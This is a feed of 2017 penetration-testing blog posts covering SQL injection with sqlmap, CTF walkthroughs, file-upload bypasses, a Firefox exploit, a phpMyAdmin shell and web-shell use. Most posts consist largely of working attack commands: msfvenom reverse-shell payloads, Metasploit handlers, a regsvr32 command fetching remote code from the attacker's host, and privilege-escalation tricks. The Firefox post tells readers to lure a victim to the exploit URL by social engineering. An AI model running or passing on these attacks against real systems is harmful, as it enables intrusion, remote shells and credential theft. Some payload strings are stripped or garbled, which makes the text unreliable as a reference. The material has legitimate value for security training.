Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all 1812 articles
Browse latest View live

Exploiting Form Based Sql Injection using Sqlmap

January 23, 2017, 8:35 am
$
0
0
In this tutorial you will came to across how to perfrom sql injection attack on a login form of any website. There are so many example related to login form like: facebook login; gmail login; other online accounts which may ask you to submit your information as username and password and then give permission to login your account on that web server.  Here we are going to perform sql inection login form attack on a vulnerable web server application  and then fetch the information present inside their database.

Lets Begin!!!
Requirement:
Xampp/Wamp Server
bWAPP Lab
Kali Linux: Burp suite, sqlmap tool

Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from herenow open the bWAPP in your pc and login with following credentials:

Let’s begin!!!

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.102:81/bWAPP/login.php. Enter userand password as bee and bug respectively.


Set security level low, from list box chooses your bug select SQL-Injection (Login form/Hero) now and click on hack.


A login form get open where it is ask to submit the credential of superhero which we don’t know. So I am going to give any random login and password like iron:man, in order to capture the request through burp suite.


To capture the request of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to login. Use intercepts highlighted data within sqlmap commands.


Now open the terminal of your kali Linux and type following command for the enumeration of databases name.
sqlmap -u http://192.168.1.102:81/bWAPP/sqli_3.php --data="login=iron&password=man&form=submit" --method POST --dbs --batch


From enumeration result we get the information of the bend-end database management system is MYSQL 5.5 and web server operating system is windows with Apache 2.4.7 and PHP 5.5.9and fetch all names of database. So if you notice image given below we have caught all name of databases. Choose any name for fetching more details.


Now type the below command which will try  to fetch entire data from inside database of bwapp
sqlmap -u http://192.168.1.102:81/bWAPP/sqli_3.php --data="login=iron&password=man&form=submit" --method POST -D bwapp --dump all --batch


First I found a table “BLOG” which contains four columns but this table appears to be empty as all fields are left blank.


Next I found table “MOVIES” in database bwapp and you can see from given screenshot it contains movies detail. There are 10 entries in each of following column


 Luckily!!! I have got data which contains id, login, password and secret entries inside the “HEROES” table and may be this dumped data can help me to bypass the login page of the above web page which we have open in the browser. I will use the login and password later to verify it.


Here I founds only three entries for table “USERS” inside the bwapp which also contains credential for admin account.


Another empty table “VISITORS” like “blog” table, it is also left blank.

Sqlmap has dumped too much of data from inside the database of bwapp, as you have seen I have got data from different table, now let’s verify this result.  Browse bwapp in local host again and once again open the login form page inside the bwapp.


If you remembered sqlmap has dumped table of “HEROES” which contains login and password now using above fetched data (Thor: Asgard) from inside the table of “heroes” I will use these credential for login.
Now type thor in the text field given for login and then type Asgard as password. Click on login.


Congrats!!! We got successful login and you can read the secret given for thor which exactly same as inside the “heroes” table.

Conclusion: Through this article we had learn how to perform an attack on a login form of a web site and retrieve its data from inside the database.


Search

Hack the USV VM (CTF Challenge)

January 26, 2017, 12:01 am
$
0
0
A new challenge for all of you guys!
This CTF is all about conquering flags coming across our way as we go further in our penetration testing of this lab.  All the flags should be discovered in form of: Country name Flag:[md5 hash]. The network interface of this virtual machine will take it’s IP settings from DHCP.

Download lab from here : https://www.vulnhub.com/entry/usv-2016-v101,175/

Let’s get started with our first step.
netdiscover

From this we get our target IP.

Target IP: 192.168.0.103


Now we will scan it with nmap which will give us all the open ports in particular lab for further penetration testing.
nmap –p- -A 192.168.0.103
This result shows that following ports are open 22 , 80 , 3129 , 3306 , 21211 and http proxy is used on port 3129.


 So now lets proceed with further penetration testing. Firstly we’ll go with ssh on port 22.
ssh 192.168.0.103
Ssh revealed a ascii Dragon with some strings and a base64 code written at bottom. Looking closer you’ll see something written on top AES-ECB.


By Google search we found out that there is a website called aesencryption.net where we can decrypt the base64 code we got in our last result. So we will decrypt that code with the given key in image by all this process we arrived at our 1st flag i.e ITALY FLAG


Ok so now let’s head towards second flag and for that we are going to open target IP in browser as port 80 is also open. Look at that. We got access forbidden. No result.


As we opened target ip in browser simultaneously we have captured the cookies through burp suite after setting the manual proxy in browser. When all this is done, right click on its window where intercepted data is fetched and a kind of action list will put on view further click to send to repeater.

Look over screenshot below you will find two panel left and right for request and response respectively. In the response window the highlighted text is our flag.


As this code is in base64 so we are going to use HackBar plugin in Mozilla firefox which is preinstalled or can be easily installed. Whoa decoding the code in it we got another flag which is our second flag i.e. CROATIA FLAG


Moving ahead, from our nmap result we got that http-proxy is set on port 3129 so we will set proxy setting for our target IP with port number 3129 as shown below.


Now try opening target IP in browser and wait for few seconds like 10 sec. The proxy setting did the trick and website reveals a single page with a changing banner of “WINTER IS COMING” and “ALL MEN MUST DIE”. Some of you may be aware of this but for those who do not know about this. It is Games of Thrones.


The site didn’t show much so I used nikto scanner with proxy to get some information about it which will be helpful in further testing.
nikto –h 192.168.0.103 –useproxy  http://192.168.0.103:3129
It reveals a wordpress login at /blog.


Ok!  Now open it in browser. Great, Games of Thrones notion is confirmed as Seven Kingdoms blog is shown.
Scrolling down in this site you can see that there is an interesting second post which shows ‘I have a message for you’. There is a highlighted option so jst try to open it in browser.


Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it.


Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at bottom.


Here we decrypt the code in the hackbar plugin which results in another flag. From this step we got our third flag i.e. PORTUGAL FLAG


 Now , returning to previous site there are several post which are all useless so just scroll down to see if there is something useful or not  and then comes a last post which is of our interest.
‘Protected: the secret chapter ‘


Oh! We have to provide a password to get through it. This one took some time and to spare your time I won’t go through my failures,
I have created dictionary of possible passwords which are nothing but some of the words in this whole page with the help of following command.
cewl –d 2 –m 5 –proxy_host 192.168.0.103 –proxy_port 3129 –w /root/Desktop/dict.txt http://192.168.0.103/blog/


From the list we get that password is ‘westerosi’
Using this password we came to another page which revealed another flag in base64 encoded string and below it some kind of images of an actress.


Now again decrypt it in and as a result we have our fourth flag i.e. PARAGUAY FLAG



Moving to one level up, from site we got another message that “the mother_of_dragons has a password which is in right front of your eyes”.
Knowing nothing about the eyes of actress I restored to google to see if I get any clue from there but no such luck.

I looked at the message again and it states ‘password which is in front of your eyes’
That’s the password of mother_of_dragons is ‘in front of your eyes’. But wait a minute where is this password is used.

We have ftp service running. So let’s try and get through it
ftp 192.168.0.103 21211
ls –al
get .note.txt
exit
cat .note.txt

bingo! Here that password is used. At the bottom result shows that children’s name is used for password. Again a password but this time it is used for wordpress login which we are going to use in coming steps.


Again I googled and found out she doesn’t had any children rather had 3 dragons named Drogon , Rhaegal and Viserion. So I put all these names into a file along with all possible combinations.
List is small so by entering each one the desired password could be find out.
Password isRhaegalDrogonViserion


Apply the credentials for wordpress and we are in!
Looking around the site I found the profile section which reveals the base64 encoded string for mother_of_dragons.


Like always decode the base64 code in HackBar and here we have another flag.
This is our fifth flag i.e. THAILAND FLAG


Now with only 2 flags left its time for shell access as we have wordpress.
Moving further, firstly make a php code through msfvenom which can be used to get the meterpreter session.
Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 –f raw


Being admin of the site I am able to edit the theme. So I replaced the 404.php code of template in Viking theme with the above highlighted php code.


On the other side to get the meterpreter session open kali terminal and run multi handler. And for that type the following commands.
Use exploit/multi/handler
Set payload php/meterpreter/reverse_tcp
Set lhost=192.168.0.103
Set lport=4444
exploit
as we have meterpreter session ,now go to shell and type following commands
echo “ import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py
python /tmp/asdf.py
cd /srv/http
ls
it shows a reward_flag.txt file so call it with cat command
cat reward_flag.txt
As a result we get a base64 encoded string.


Do not worry soon this decoding thing is going to over as we have sixth flag with this decoding. So as a result our sixth flag is MONGOLIA FLAG


Back to another file in above list of files i.e. winterfell_messenger .  We see its executable and owner is root. So run it with following command
./winterfell_messenger
Cat: /root/message.txt
It shows that it’s using cat command to read a file in the /root directory.
Using strings shows that cat command is being used; however it’s not using the full path to the program. From this we come to know that it will search for set PATH to run.


Now, we are able to update PATH by using export but first we need to find out the writable directory and for that we have used /tmp. In /tmp we will create an executable file named cat so it can be called by the winterfell_messenger program. This file will be running as root so we will use /bin/bash to call shell and to change the mode. Run the following commands.
echo “ /bin/bash” > /tmp/cat
chmod 777 /tmp/cat
echo $PATH
/usr/local/sbin: /usr/local/bin:/usr/sbin:/usr/bin
After this step we are going to update the PATH to remove the /tmpdirectory  we added. For this type the following commands.
Export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
Now, we will go to the home directory of http to get the desired file . For that type
cd  /srv/http
ls
now  call the winterfell_messenger file by using given command.
./winterfell_message
id


Now go to root and there we have .flag.txt file.
Now running cat against .flag.txt we get a congratulations, a wolf made up of ascii characters and a base64 encoded string at the bottom. Commands are given below.
 cd /root
/usr/sbin/cat .flag.txt


Finally decoding in hackbar reveals seventh and last flag which is nothing but the SOMALIA FLAG


Whoola. We reached at the end and with this job is done. Hope you enjoyed it and obviously penetration skills are refreshed.

Web Penetration Testing with Tamper Data (Firefox Add-on)

January 26, 2017, 7:37 am
$
0
0
One of the more popular hacker tools for Firefox is an add-on called Tamper Data. Tamper Data isn't a super complicated tool; it's merely a proxy, or go-between, that inserts it in-between the user and the web site or web application that they are browsing.

All those GETs and POSTs can be manipulated without the constraints imposed by the user interface seen in the browser.

It allows a person to tamper with the data being sent back and forth between the client and the server. When Tamper Data is started and a web app or website is launched in Firefox, Tamper Data will show all of the fields that allow user input or manipulation.

Hackers can then change a field to an "alternate value" and send the data to the server to see how it reacts.

Installing Tamper Data Add-On


Select the menu bar on the right end in Firefox. Click on Add-ons.


In the search bar field, search for Tamper Data add-on. Click on Install after installing the add-on, restart the Firefox Browser.


Displaying clear text password in Facebook using Tamper Data

Now I am trying to login into my Facebook account and when I typed my password I see the “password in dotted form" so I wanted to know whether the password typed is correct or not. Click on tools option from menu bar and select tamper data to capture the request


A pop will get open for tamper data clickon start tamper which start capturing the ongoing request As we know that the username and password typed in the fields go through POST method. Now After that click on Login button to send the data through POST method.


When the request will send through browser to web server a pop up will appear, now hit Tamper, which will start capturing the sending request.


Now you can see from given image on the right half of Tamper Popup window it is showing the email and pass in clear text.


HTML Injection - Reflection POST method with Tamper Data

I have installed bWAPPon my wamp server running on localhost. It can be accessed through browser. Navigate to login page using url “localhost/bWAPP/login.php".

Login into web application server by typing bee: bug as login credential, now choose your bug” html injection-reflected (post)” from given list of bugs and clickon hack.


In given text field enter first name: kunaland last name: bhal.


Before clicking Go; again start tamper data to change the field values.After that we can see the post values and now modify it to change the username of any person.

Now click on go and a dialog box get opened here click on tamper to capture the request.


Here you can read the captured request from given screenshot which has captured the first and last name kunal: bhal.


Tamper data allow you to modify the sent request of any user without his permission, so I am going to change first and last name given by user into first as first name and last as last name and then click on ok to forword the request.


Now you can see the request has been forward on the web server.


We successfully changed the username of the person; here you can see username to be "first last". Similarly you can use other modules with tamper data to exploit bWAPP.


File upload using tamper data
Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and login with following credentials:

Username – admin
Password – password

Click on DVWA Security and set Website Security Level medium then select file upload vulnerability
Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f raw

Copy and paste the highlighted code in leafpad and save as with PHP extension as hacked.php.png on the desktop.

Load metasploit framework type msfconsole and start multi handler.


Now click to browse button to browse hacked.php.png file to upload.


Click on tools option from menu bar and select tamper data to capture the request.


Before clicking upload; again start tamper data and then click on upload; when the request will send through browser to web server a pop up will appear then, now hitTamper, which will intercept the sending request.


From given screenshot you can see tamper data has capture the POST request now copy the selected data from POST DATA.


Paste POST DATA in a text file to change the extension of our upload. As you can read the name of file is hack.php.png but we want to upload a php file.


Now modify pasted POST DATA hacked.php.png into hacked.php then select and copy the complete data.


Now past the whole data of text file in the field given for POST DATA and click on ok


So here we have forward the modified request, now click on stop tamper.


From screenshot you can see our php is uploaded in uploads directory. Now copy the highlighted path /hackable/uploads/hacked.php where file is uploaded and run this path

http://192.168.1.102:81/DVWA/hackable/uploads/hacked.phpin URL to execute it.


You will get victim reverse connection on metasploit.
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

meterpreter > sysinfo

I have got meterpreter session of victim PC

Hack the Pipe VM (CTF Challenge)

January 28, 2017, 8:00 am
$
0
0
PIPE is another CTF which gives you a platform to enhance your penetration testing skills. So let’s not waste any more time and get started with it.
First of all download pipe lab from here
Like always our first step would be to run netdiscover command to see the active hosts in our network.

netdiscover

Target IP: 192.168.0.103


As we have target IP so we will do nmap scan to see if there are any ports active for further penetration.
nmap –p- -A 192.168.0.103
And from here we get open ports 22, 80, 111, 54073.


Now we will open target IP in browser as port 80 is active. Here the website reflects off unauthorized message with a login page. On login window it written “the site says: index.php” which we will be using later on


Now using burpsuite we are going to capture the cookies for login page by setting manual proxy of firefox browser. It has intercepted data for login page. Changes are to be made in GET parameter in to get authentication.
HACK / index.php


After this step, forward request to the browser for execution of process and finally getting into website.
Ok! To above step leads us to website which shows a PIPE picture and a link below it to get artist info.


As we cannot see anything else on this web page so right click anywhere on page and choose view page source. It shows an accessible directory scriptz in its script content.


Now open target ip with scriptz in browser.
192.168.0.103/scriptz/
Oh! Look at that we found an accessible directory.

We will first open log.php.BAK file and see if we get some information to go further or not. And see what it shows. It seems that this file will write itself on the webroot directory. This is very interesting to us especially if we can control the `data` field supplied to the file.

cat log.php.bak


Now again returning to our original web page and simultaneously start burp suite by setting manual proxy for it. Click on the link given below image and capture cookies that request in burp.


Here we have the intercepted data in burp window which shows the parameter used for above web page.


After above step right click on this window and list of some options will appear choose sent to repeater and as a result 2 windows will get opened one for request and one for response.

Select the parameter in request tab and send it for decoding in smart decoder. This can be done by right clicking on selected text and then sending it to decoder. Now select decoder tab from above menu and choose smart decoder from left side menu. In the image below red highlighted text is decoded and result is shown in below window the code which is given in bottom window need to be altered so that we can upload our malicious code.


Now going back to our intercept window we see that our earlier parameter is decoded where we can make changes according to our requirements. So the changes are as follows.
0:4->0:3, Info->log, s->8, id->filename, s->31
Then give the path of file i.e. /var/www/html/scriptz/shell.php
s->4, rene->data, s->60
and then code which is to be executed i.e. ’ ; system($_GET[‘cmd’]) ; echo ‘
’;?>”;)
Now forward the request to browser.


Great our shell.php file is uploaded in that accessible directory.


Now we have uploaded shell it’s time to open it see what it gives us. As we have executed the code for cmd, we will type cmd in URL as well.
cmd=id
It shows the following data in the command we executed.
uid=33(www-data) gid=33(www-data) groups=33(www-data)


That’s the game! It’s time to exploit through shell that we have uploaded in accessible directory.
Now open terminal in kali Linux and proceed to Metasploit by typing msfconsole.
Thereafter find the exploits for search web_delivery and use the exploit followed by set target, payload, lhost, lport and run exploit.
Use exploit/multi/script/web_delivery
Show targets
Set target 2
Set lhost 192.168.0.104
Set lport 4444
Set payload php/meterpreter/reverse_tcp
run
At last when all the commands are executed, it will provide a code at the bottom of image.

Now again copy the code which we get as a result and paste it in URL after cmd and execute it.

As soon as we execute the code in URL we will get meterpreter session of our target i.e. PIPE
Now we will go to shell by typing
Shell
echo "import pty; pty.spawn('/bin/bash')"> /tmp/asdf.py
python /tmp/asdf.py

Our next step is to find the kernel version of Ubuntu. TO know the said type: lsb_release -a

We check for any cronjobs running on the system via cat /etc/crontab we can see a couple of cron jobs running which interest us.
In /etc/crontab the script /usr/bin/compress.sh which is world readable now follow the following steps


Now time to do some magic follow the following steps

Cd /home/rene/backup
Echo ‘cp /root/flag.txt;chmod –r /tmp/flag.txt’ > flag.sh
Touch /home/rene/backup/--checkpoint=1
Touch /home/rene/backup/--checkpoint=-action=exec=sh\ flag.sh
Cd /tmp


At last open this flag.txt file and we have our flag. Mission accomplished!

5 ways to File upload vulnerability Exploitation

January 30, 2017, 9:20 am
$
0
0


File upload vulnerability is a major problem with web based applications. In many web servers this vulnerability depends entirely on purpose, that allows an attacker to upload a file with malicious code in it that can be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.

Attacker may reveal internal information of web server to other and in some chances to sensitive data might be informal, by unauthorized people.

In this tutorial we are going to disscuss various types of file upload vulnerbility and then try to exploit them. You will learn the different injection techniques to upload a malicious file of php in a web server and exploit them.
Basic file upload Technique

In this scenario a simple php file will get uploaded on the web server without any restrictions, here server does not check the content- type or file extensions to be uploaded.

For example if server allows to upload a text file or image, which is considered as data and if security parameter is low where as no restrictions  on the content-type or filename then you can easily bypass malicious php file which is considered as application in the web server.

Let’s start!!!
Click on DVWA Security and set Website Security Level low

Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=4444 -f raw

Copy and paste the highlighted code in leafpad and save as with PHP extension as img.php on the desktop.

Load metasploit framework type msfconsole and start multi handler.


Come back to your DVWA lab and click to file upload option from vulnerability menu.

Now click on browse tag to browse img.php file to upload it on web server and click on upload which will upload your file on web server.



After uploading the PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and paste it in URL to execute it.

hackable/uploads/img.php


msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo

You can observe, I have got meterpreter session 1 of victim PC on the metasploit.


Double extension injection Technique

Click on DVWA Security and set Website Security Level medium

Here we come across a situation where it would check the file extension. In medium security it only allows .jpeg and .png extension file to be uploaded on the web server and restricts other files with single file extension while uploading in the web server. Now there are some techniques through which we will bypass the malicious PHP file in the web server.

 


It is an attempt to hide the real nature of a file by inserting multiple extensions with filename which creates confusion for security parameters. For example img1.php.png look like png image which is a data not an application but when the file is uploaded with double extension it will execute php file which is an application.

Let’s continue!!!

Repeat same process to create the php backdoorwith msfvenom and now save the fileas img1.php.png on desktop and run the multi handler at the background.

Since this file will get upload in medium security which is little different from low security as this will apparently check the extension of file as well as read the file name.

Click to file upload option from vulnerability menu. Again click on browse button to browse img1.php.pngfile to upload it. Now start burp suite and make intercept on under proxy tab.  Don’t forget to set manual proxy of your browser and click on upload.
 



Intercept tab will work to catch the sent request of the post method when you click to upload button.  Now change img1.php.png into img1.php inside the fetched data.


Compare the change before uploading your PHP file. After altering click on forward to upload PHP file in directory.


After uploading the PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and paste it in URL to execute it.

hackable/uploads/img1.php


This’ll provide a meterpreter session 2 when you run URL in browser.
 meterpreter > sysinfo


Content – Type file Upload

"Content-Type" entity in the header of the request indicates the internal media type of the message content. Sometimes web applications use this parameter in order to recognize a file as a valid one. For instance, they only accept the files with the "Content-Type" of "text/plain".It is possible to bypass this protection by changing this parameter in the request header using a web proxy.

Again repeat the same process to create the php backdoor with msfvenom and now save the fileas img2.php on desktop and run the multi handler at the background


Start burp suite and repeat the process for fetching the sent request. In the screenshot you can read the content- type for php file; now change this content type application/x-php into image/png to upload your php file.




From below image you can perceive the manipulation in content type which known as content-type injection technique.


Now copy the selected part and past it in URL to execute it.
hackable/uploads/img2.php


This’ll provide a meterpreter session 3 when you run URL in browser.
 meterpreter > sysinfo


Null byte Injection

Null Byte Injection is an exploitation technique which uses URL-encoded null byte characters (i.e. , or 0x00 in hex) to the user-supplied data. A null byte in the URL is represented by '' which in ASCII is a "" (blank space).This injection process can alter the intended logic of the application and allow malicious adversary to get unauthorized access to the system files.

Now here you will see I have inserted a string at the end of extension and change that string into its  hex  value and then replace that hex value from null byte character ‘’. The reason behind inserting a null byte value is that, some application servers scripting language still use c/c++ libraries to check the filename and content. In c/c++  a line ends with /00 is called null byte.

Hence when the compiler studies a null byte at the end of the string, it will assume that it has arrived at the end of string and stop further reading of string.

Now create the phpbackdoor with msfvenom and now save the fileas img3.php.jpg on desktop and run the multi handler at the background.
 
Start burp suite and repeat the process for fetching the sent request. It look same like double extension file but here the technique is quite different from double extension file uploading.


Add any string or alphabet as shown in the screenshot here and you will notice that in the highlighted text I have made change in img3.php.jpg into img3.phpD.jpg, now follow the next step will be to modify this string into null byte.


In next step we will decode the inserted string; now decode your string or alphabet as I had given ‘D’ now decodes it into hex which will tell its hex value and from screenshot you can read its hex value is 44.


Now click on hex option under intercept which will display the hex value of intercepted data. Here you can read the hex value for the file name which I have highlighted. In order to null exploitation replace the hex value 44from null byte value 00.


Now you can perceive the changes from the given screenshot where I have injected the null value in the place of hex value of our inserted string.


When again you will view the raw data, now here you will find that the string ’D’ is changed into null byte value.


Now forward the intercepted data to exploit file upload through null byte injection technique. Great!!! We have bypass the medium security now copy the uploaded path and past it in URL to execute it.


When you will run the path it will give you reverse connection on metasploit and from the given screenshot you can see I have got meterpreter session 4 also. 



Blacklisting File Extensions

Next target is bwapp which is another web server Set security level medium, from list box choose your bug and select Unrestricted File Upload now and click on hack

Some sever side scripting language check .php extension at filename and allow only those file which does not contain .php extension. Here we can inject our file by changing a number of letters to their capital forms to bypass the case sensitive rule, for example PHp or PHP3.


Now create the phpbackdoor with msfvenom and now save the fileas img4.php3 on desktop and run the multi handler at the background.

Then browse img4.php3 to upload in web server and click on upload tab. Here in medium security it will allow the php file to get upload on web server and from given screenshot you can see my php file is successfully uploaded.  Now click on the link hereand you will get reverse connection at multi handler.



msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo

Great!!!  You can see I have got meterpreter session 1.


Source: https://www.owasp.org/index.php/Unrestricted_File_Upload


Hack Windows PC using FirefoxnsSMILTimeContainer::NotifyTimeChange() RCE

January 31, 2017, 10:15 am
$
0
0
This module exploits an out-of-bounds indexing/use-after-free condition present in nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox on Microsoft Windows.

Exploit Targets
Firefox 38

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/browser/firefox_smil_uaf
msf exploit (firefox_smil_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_smil_uaf)>set lhost 192.168.0.104 (IP of Local Host)
msf exploit (firefox_smil_uaf)>set srvhost 192.168.0.104 (IP of Local Host)
msf exploit (firefox_smil_uaf)>set uripath / (IP of Local Host)
msf exploit (firefox_smil_uaf)>exploit


Now an URL you should give to your victim http://192.168.0.104:8080/victim via chat or email or any social engineering technique.


Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Shell Uploading in Web Server through PhpMyAdmin

February 1, 2017, 6:35 am
$
0
0
In this tutorial we will learn how to exploit a web server if we found phpmyadmin panel has been left open. Here I will try to exploit phpmyadmin which is running inside the localhost “xampp” by generating a SQL query to execute malicious code and then make an effort to access the shell of victim’s Pc.

PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. Frequently used operations (managing databases, tables, columns, relations, indexes, users, permissions, etc) can be performed via the user interface, while you still have the ability to directly execute any SQL statement.

Features
·         Intuitive web interface
·         Support for most MySQL features:
·         browse and drop databases, tables, views, fields and indexes
·         create, copy, drop, rename and alter databases, tables, fields and indexes
·         maintenance server, databases and tables, with proposals on server configuration
·         execute, edit and bookmark any SQL-statement, even batch-queries
·         manage MySQL user accounts and privileges
·         manage stored procedures and triggers
·         Import data from CSV and SQL
·         Export data to various formats: CSV, SQL, XML, PDF, ISO/IEC 26300 - OpenDocument Text and Spreadsheet, Word, LATEX and others
·         Administering multiple servers
·         Creating graphics of your database layout in various formats
·         Creating complex queries using Query-by-example (QBE)
·         Searching globally in a database or a subset of it
·         Transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link

For information visit: https://www.phpmyadmin.net

Lets start!!!

Open the localhost address:192.168.1.101:81 in the browser and select the option phpmyadminfrom the given list of xampp as shown the following screenshot.


When you come into PhpMyAdmin application, here you will find different areas. On the left side of the screen you can see the list of database names. As we are inside the administration console where we can perform multiple tasks which I have defined above therefore I am going to create a new database
Now click on new to create a database.


Give name to your databaseas I have given Ignite technologiesand click on create.


Now you can see the database ignite technologies has been added in the list of databases.


Click on ignite technologies database to construct MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.


Now this is interesting part because here I am going to execute a malicious code as SQL query which will create a command shell vulnerability inside the web server. 
SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php"
In the following screenshot you can see I have given above malicious php code as SQL query and then click on GO tab to execute it.

Now type following URL to find whether we are successful or not in order to create OS command shell vulnerability.

http://192.168.1.101:81/backdoor.php
Awesome!!!  You can see it has given warning which means we had successfully created OS command shell vulnerability.

http://192.168.1.101:81/backdoor.php?cmd=dir
When you execute above URL in the browser you will get the information of victim‘s PC directories.


Next step will to achieve meterpreter session of victim’s Pc.
Open other terminal in kali Linux and type following command.
msfconsole
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.104
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit
Copy the selected part for dll file and use this malicious code as the command inside the URL.
regsvr32 /s /n /u /i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll


Paste the above code the URL and execute it which will give meterpreter session on metasploit
http://192.168.1.101:81/backdoor.php?cmd= regsvr32 /s /n /u /i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll

From following screenshot you can see meterpreter session 1 opened.


Sessions –i 1
Meterpreter>sysinfo

Web Shells Penetration Testing (Begineer Guide)

February 3, 2017, 6:37 am
$
0
0
 Through this article I would like to share file uploading using different type web shell scripts on a web server and try to get unauthorized access in the server.

Web shells are the scripts that are coded in different languages like PHP, Python, ASP, Perl and many other languages which further use as backdoor for unauthorized access in any server by uploading it on a web server.

Once the shell get uploaded on the target location, the attacker may able to perform the read and write operation directly, he will be able to edit any file or delete the file from the server.

Attacker: Kali Linux
Target: Bwapp
Let’s begin!!!

B374k script

Open terminal and type following command to download b374k script from github.

Git clone https://github.com/b374k/b374k


This is a PHP shell which provides reveres connection to the attacker machine and where he can execute the command to retrieve victim’s information.


Following command will create a malicious file shell.php as the backdoor shell with password raj123.
Php –f index.php -- -o shell.php –p raj123


Now let’s open the target IP in browser: 192.168.1.103:81/bWAPP/login.php. Enter user and password as bee and bug respectively.
Set security level low, from list box chooses your bug select Unrestricted File Upload now and click on hack.


Here you can see the web server allow us to upload an image under the web page of unrestricted file upload.


Click on browse to upload the shell.php in the web server and then click on upload.

Now you can read the message from the screenshot that”image has been uploaded here” which means our php backdoor is uploaded successfully. Now click on the link “here”.

Here required password to execute shell.php and I had given raj123 as its password.


From given screenshot you can see, we are inside the directory of images.


Click on terminal tab from menu barof b374k which will provide victims terminal to execute the desired commands. From given image you can read the command which I have executed.
Lsb_release -a


Now I will connect b347k shell from netcat and try to access victim’s shell. Open the terminal in kali Linux and type following command for netcat.

Nc 192.168.0.103 8888

Inside shell b347k from menu select networkoption to openbind connection give IP of target:192.168.0.103 as server IP and port 8888 now scroll down the list and selectPerl then click on run.


This will give you reverse connection on netcat and from the given screenshot you can read the victim information which I have got when I execute the following commands.
Whoami
Cat/etc/passwd


C99shell script
Download c99shell from the given link

https://github.com/tennc/webshell/tree/master/php/PHPshell/c99shell

C99shell is a PHP backdoor which provides details of files and folders when it get uploaded and let you perform command execution through it.


This time again open web server IP in the browser to upload the c99shell.php


Here you can read the message from the screenshot that”image has been uploaded here” which means our php backdoor is uploaded successfully. Now click on the link “here”.



Here our php malicious file is executed where it is dumping the names of 25 files. From screenshot you can see all files under images directory are jpg, png, gif images.


Now select bind option from menu to connect host from netcat. Repeat the same process to run netcat at the background and then give host IP: 192.168.0.103 and port: 8888 select using Perl and click on connect.


This  will give you reverse connection on netcat.


Weevely Web Shell

Weevely is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.

Its terminal executes arbitrary remote code through the small footprint PHP agent that sits on the HTTP server. Over 30 modules shapes an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation and network lateral movement, even in restricted environment.

Open the terminal and typefollowing command which will create a web shell as backdoor.php on the Desktop with password pass.

weevely generate raj123 /root/Desktop/weevely.php


Open the target location where you want to upload your backdoor. Now I am going to browse weevely.php and then click on upload to upload your web shell. Now you can see from the given screenshot the weevely.php has been successfully uploaded.
Make right click on the link “here” and click on copy link location.


Again type following command to start the attack on the web server and post above copied URL with password raj123 inside the weevely command.

weevely http://192.168.1.103:81/bWAPP/images/weevely.php raj123

Now you can see that I have got victim shell through Weevely. Now type following command to retrieve victim’s information.

Whoami
Cat/etc/password


Type help in front of weevely which will show all module present inside it.


WSO script

Download this script from given link.

https://cloud.github.com/downloads/orbweb/PHP-SHELL-WSO/wso2.5.1.php

This also a PHP script which is quite similar to c99shell.php & b347k.php shells and perform same function as c99 script.

Again repeat the same process to upload wso2.5.1.php script inside the bwapp then click on link “here”.

After executing the shell, you will see it has retrieved the basic information of target and dump the files and folder names.


Now all options are same as above, now try yourself to connect this shell with netcat.

Search

Hack the Gibson VM (CTF Challenge)

February 5, 2017, 8:35 am
$
0
0
It’s a boot2root challenge and it does not get over with getting root access. You have to find flag also. So let’s start.
First of all download lab from https://download.vulnhub.com/gibson/gibson.ova
Now open kali terminal and like always start with first step i.e. netdiscover
netdiscover
it shows all the hosts those are up in our network and from here we get our target ip.

Target IP: 192.168.1.6


As our target is all set we are going to scan it with nmap which will show all the open ports. In this case open ports are only two i.e. 22 and 80.
nmap –p- -A 192.168.1.6


As from the above result we have got 80 port open so we will open target ip in browser. It shows an accessible directory. Let’s try opening it as we cannot see anything important here.


Oh no such luck with this also. It’s written the result will be found by brute force but there is no place where we can apply brute force


As we do not have any other option so let’s just go to view page source to see if we could get any clue to move further in our task. Right click on page and choose view page source. Great, we have password god for margo

